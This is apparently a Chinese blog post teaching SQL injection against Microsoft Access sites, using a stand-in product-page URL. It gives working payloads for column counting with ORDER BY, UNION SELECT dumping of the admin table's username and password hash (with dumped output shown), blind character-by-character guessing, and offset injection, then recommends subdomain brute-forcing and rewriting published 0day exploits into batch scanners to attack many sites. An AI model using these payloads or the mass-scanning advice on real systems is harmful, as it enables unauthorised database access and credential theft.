Sql注入基础_access注入
1.access注入攻击片段-联合查询
2.access注入攻击片段-逐字猜解法
3.Access偏移注入(表名和列名猜解成功率不是百分百,猜解不到)
access注入攻击片段-联合查询法
判断注入
猜解表名
猜解列名
猜解数据
个
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误
猜解表名
确定存在admin表名
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513
UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
from admin
爆出3,5
| 名称: | 3 | 
| 介绍: | 15 | 
猜解列名
猜解数据(在3和15位置上填入可能存在的列名)
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513
UNION SELECT
1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22
from admin
爆出帐号密码
| 名称: | a48e190fafc257d3 | 
| 介绍: | admin | 
2.access注入攻击片段-逐字猜解法
查表:and exists (select * from 表名)
查列:and exists (select 列名from 表名)
查数据:1.确定长度 2.确定asc数据(asc编码)
and (select top 1 len(列名) from admin)=5
and (select top 1 asc(mid(列名,位数,1)) from admin)=97
and (select top 1 asc(mid(列名,位数,1)) from admin)=97
Admin
Admin,password
Admin列名长度为5
Password
列名长度为16
3.access偏移注入是解决一些注入出不来列名或者时的情况,同时要求支持union select ,列名也必须足够多,知道表名
https://www.cnblogs.com/habi/articles/7837565.html
旁注查询,子域名查询
旁注查询:同服务器下不同的站点,寻找查询接口
http://dns.aizhan.com/www.whxy.net/
子域名查询:
分为二级或三级域名,可能存在同服务器或同网段
搜索引擎查询,暴力猜解(layer,subDomainsBrute等)
www.0day5.com,可以上这个网站看看最新的oday ,改写里面的exp改成批量扫描的,批量扫站
Sql注入基础_access注入的更多相关文章
- Sql注入基础_mysql注入
		
Mysql数据库结构 数据库A 表名 列名 数据 数据库B 表名 列名 数据 Mysql5.0以上自带数据库:information_schema information_schema:存储mysql ...
 - Sql注入基础原理介绍
		
说明:文章所有内容均截选自实验楼教程[Sql注入基础原理介绍]~ 实验原理 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击, ...
 - Sql注入基础一
		
凡是带入数据库查询的都有可能是注入. 整个数据包 Sql注入原理? 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作问题. Sql注入对于渗透的作用? 获取数据(网 ...
 - sql注入基础知识
		
信息安全概论课堂作业 SQL注入之万能密码漏洞 第一道题是牵扯到了万能密码漏洞 用户名先输入个’ 返回了sql报错语句,猜测存在sql注入漏洞 使用万能密码测试 登陆成功 原理 假设登录框处的判断代码 ...
 - 基础Web漏洞-SQL注入入门(手工注入篇)
		
一.什么是SQL注入 SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL.而SQL注入是将Web页面的原URL.表单域或数据包输入的参数,修改拼接成SQ ...
 - SQL注入 基础学习
		
SQL注入学习笔记 注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有 ...
 - 注入攻击-SQL注入和代码注入
		
注入攻击 OWASP将注入攻击和跨站脚本攻击(XSS)列入网络应用程序十大常见安全风险.实际上,它们会一起出现,因为 XSS 攻击依赖于注入攻击的成功.虽然这是最明显的组合关系,但是注入攻击带来的不仅 ...
 - sql工具和手工注入总结
		
普通注入: 数字注入 字符注入 base64注入:和常规的方法没有说明区别,主要是解码然后编码: 如果普通注入不行,尝试大小写绕过,编码等绕过: 如果不行尝试盲注: POST注入 0x00 常用的 注 ...
 - StringEscapeUtils的常用使用,防止SQL注入及XSS注入
		
StringEscapeUtils的常用使用,防止SQL注入及XSS注入 2017年10月20日 11:29:44 小狮王 阅读数:8974 版权声明:本文为博主原创文章,转载请注明出处. htt ...
 
随机推荐
- JWT—JSON Web Token - 理解JWT网络间应用用户安全认证交互设计
			
原文地址:http://blog.leapoahead.com/2015/09/06/understanding-jwt/ 官网地址:https://jwt.io/ JSON Web Token(JW ...
 - 光栅化规则(Rasterization Rules)
			
光栅化规则不是唯一的,只要能满足在扫描线填充过程中,对于一条分割线两边的像素能够被不重复不遗漏地填充即可. 在gdi3d中目前使用的是下面光栅化规则: xLeft_int=ceil(xLeft-0.5 ...
 - Atitit.跨语言数据库db  api兼容性 jdbc odbc ado oledb 增强方案
			
Atitit.跨语言数据库db api兼容性 jdbc odbc ado oledb 增强方案 1. 跨语言db api兼容性..1 2. 目前访问数据库的接口很多.比较常用的jdbc odbc 以 ...
 - C# 操作超时正常还是错
			
net(客户端)调用IIS(服务端)出现503后,就报操作超时错误 问题描述:服务端环境:IIS 客户端环境:windowsxp + iis + .net 调用时出现如下错误:System.Net.W ...
 - INSERT 失败,因为下列 SET 选项的设置不正确: 'ARITHABORT'
			
当你在SQL Server上试图更新一个索引视图引用的表时,你可能回收到如下有错误 INSERT 失败,因为下列 SET 选项的设置不正确: 'ARITHABORT' 你必须在TSQL前Set ARI ...
 - 给 JavaScript 开发者讲讲函数式编程
			
本文译自:Functional Programming for JavaScript People 和大多数人一样,我在几个月前听到了很多关于函数式编程的东西,不过并没有更深入的了解.于我而言,可能只 ...
 - 557. Reverse Words in a String III【easy】
			
557. Reverse Words in a String III[easy] Given a string, you need to reverse the order of characters ...
 - vue 组件1
			
注意:vue组件中的data必须为一个函数,要不vue就会停止工作. 构成组件 组件意味着协同工作,通常父子组件会是这样的关系:组件A在它的模板中使用了组件B,他们之间必然需要相互通信:父组件需要给子 ...
 - centos配置IP地址
			
1. vi /etc/sysconfig/network-scripts/ifcfg-eth0 2. DEVICE=eth1HWADDR=00:0C:29:D2:9A:F5TYPE=EthernetU ...
 - D. Powerful array 离线+莫队算法 给定n个数,m次查询;每次查询[l,r]的权值; 权值计算方法:区间某个数x的个数cnt,那么贡献为cnt*cnt*x; 所有贡献和即为该区间的值;
			
D. Powerful array time limit per test seconds memory limit per test megabytes input standard input o ...